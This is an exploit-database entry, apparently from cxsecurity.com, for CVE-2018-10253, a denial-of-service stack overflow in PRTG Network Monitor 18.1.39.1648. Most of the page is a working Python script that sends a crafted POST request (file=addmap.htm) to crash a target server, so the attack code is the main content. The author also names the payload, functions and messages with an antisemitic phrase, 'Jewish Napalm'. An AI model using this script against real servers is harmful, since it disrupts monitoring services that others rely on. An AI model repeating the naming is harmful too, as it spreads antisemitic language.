PRTG Network Monitor < 18.1.39.1648 Stack Overflow (Denial of Service)

2018.04.24
Credit: luriel
Risk: Low
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow # Date: 2018-04-21 # Exploit Author: Lucas "luriel" Carmo # Vendor Homepage: https://www.paessler.com/prtg # Software Link: https://www.paessler.com/download/prtg-download # Version: 18.1.39.1648 # CVE : CVE-2018-10253 # Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5 # http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/ #!/usr/bin/python import requests import sys import os import re import socket green = "\033[1;32m" yellow = '\033[1;33m' normal = '\033[0;0m' banner = """ ██╗███████╗██╗ ██╗██╗███████╗██╗ ██╗ ███╗ ██╗ █████╗ ██████╗ █████╗ ██╗ ███╗ ███╗ ██║██╔════╝██║ ██║██║██╔════╝██║ ██║ ████╗ ██║██╔══██╗██╔══██╗██╔══██╗██║ ████╗ ████║ ██║█████╗ ██║ █╗ ██║██║███████╗███████║ ██╔██╗ ██║███████║██████╔╝███████║██║ ██╔████╔██║ ██ ██║██╔══╝ ██║███╗██║██║╚════██║██╔══██║ ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║ ██║╚██╔╝██║ ╚█████╔╝███████╗╚███╔███╔╝██║███████║██║ ██║ ██║ ╚████║██║ ██║██║ ██║ ██║███████╗██║ ╚═╝ ██║ ╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ """ banner2 = """ Author: @Lucas "luriel" Carmo """ os.system('clear') print(green+banner) print(yellow+banner2) print(normal) def check_http(url): pattern = re.compile("http://") return re.search(pattern, url) def sanitize_url(url): if(not check_http(url)): return "http://" + url return url def check_server(url): r = requests.get(url, timeout=4) code = r.status_code def send_jewish_payload(url): payload = {'file':'addmap.htm'} r = requests.post(url, params=payload) def main(): try: if len(sys.argv) <= 3 and len (sys.argv) >= 2: try: url = sanitize_url(sys.argv[1]) print(' [#] LOADING!') if (check_server(url) != 404): send_jewish_payload(url) else: print(' [!] Server shutdown or not found') except requests.exceptions.ConnectionError: print(' [~] BOOOOOM! PRTG Server has been exploded!') except requests.exceptions.InvalidURL: print(' [!] Invalid URL') except requests.exceptions.Timeout: print(' [!] Connection Timeout\n') else: print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm') except KeyboardInterrupt: print(' [!] Jewish Napalm Canceled;.....[./]') if __name__ == '__main__': main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top